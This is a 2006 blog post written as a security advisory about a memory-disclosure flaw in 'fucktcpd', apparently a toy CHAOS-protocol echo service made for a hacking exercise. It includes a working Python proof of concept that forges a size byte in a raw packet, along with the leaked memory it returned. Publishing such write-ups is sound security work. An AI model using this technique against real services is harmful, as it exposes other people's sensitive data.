-atlas wandering-
   


-atlas wandering-
Bloggorama for breaking things

\

Categories:
  • /(38)

Subscribe
Subscribe to a (RSS) feed of this weblog.



Archives


This Blog

       
Thu, 06 Jul 2006

Security Advisory: fucktcpd information disclosure vulnerability

Advisory: 2006-atlas-001
Affected Software: fucktcpd
Affected Versions: all
Main Developer: invisigoth
Risk Rating: Moderate
Remotely Exploitable: Yes
Locally Exploitable: Yes
Release Date: 2006-07-06

Description:
------------
fucktcpd is a not quite popular checksumming form of echo. The key feature of fucktcpd is that it does not use TCP or UDP, but rather the CHAOS/IP protocol.

Vulnerability:
--------------
fucktcpd uses a simple protocol. It expects a string of data using protocol 16 (CHAOS). The third byte of the packet payload indicates the size of the data being handed in. Because the buffer used is 0x1000 in size, and a single-byte size variable can only indicate up to 256 bytes, no buffer is overflowed. The resulting heap allocation and memory copying adhere to acceptable bounds checking, at least with regard to buffer overflows.

However, the size bytes is not correctly validated against true input size, resulting in possible information disclosure.
For example, handing in a string of data which contains only the first three bytes of payload, but providing a size-byte of 0xff (255), arbitrary memory is accessed, copied, checksummed, and sent back to the attacker. If sensitive data was previously sent to the fucktcpd service, this information may be sent to an attacker

Example:
--------
#!/usr/bin/python

from socket import *
import sys



sock = socket(AF_INET, SOCK_RAW, getprotobyname("chaos"))

def send(host, data):
  sock.sendto(data, (host,0))

def recv():
  data,sender = sock.recvfrom(2000)
  print "got %d bytes from %s" % (len(data), repr(sender))
  print "DATA: %s" % (repr(data))

exploit = "\x00\x00\xff"
send(sys.argv[1], exploit)
recv()



$ sudo ./fyou-fucktcpd.py 192.168.255.128
Password:
got 278 bytes from ('192.168.255.128', 32756)
DATA: 'E\x00\x01\x16\x00v\x00\x00@\x10\xf9\x8e\xc0\xa8\xff\x80\xc0\xa8\xff\x01\x01\xe2\xffaA0aA1aA2aA3aA4aA5aA6aA7aA8aA9aB0aB1aB2aB3
aB4aB5aB6aB7aB8aB9aC0aC1aC2aC3aC4aC5aC6aC7aC8aC9aD0aD1aD2aD3aD4aD5aD6aD7aD8aD9aE0aE1aE2aE3aE4aE5aE6aE7aE8aE9aF0aF1aF2aF3aF4aF5aF6aF7
aF8aF9aG0aG1aG2aG3aG4aG5aG6aG7aG8aG9aH0aH1aH2aH3aH4aH5aH6aH7aH8aH9aI0aI1aI2aI3aI4'


Credits:
--------
atlas for his bull-headed stupidity
invisigoth for the enjoyable exercize
1@stPlace for putting up with atlas' continual rantings and detailed walkthrough of fucktcpd

http://atlas.r4780y.com/




[] permanent link / /




November 2008
Sun Mon Tue Wed Thu Fri Sat
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30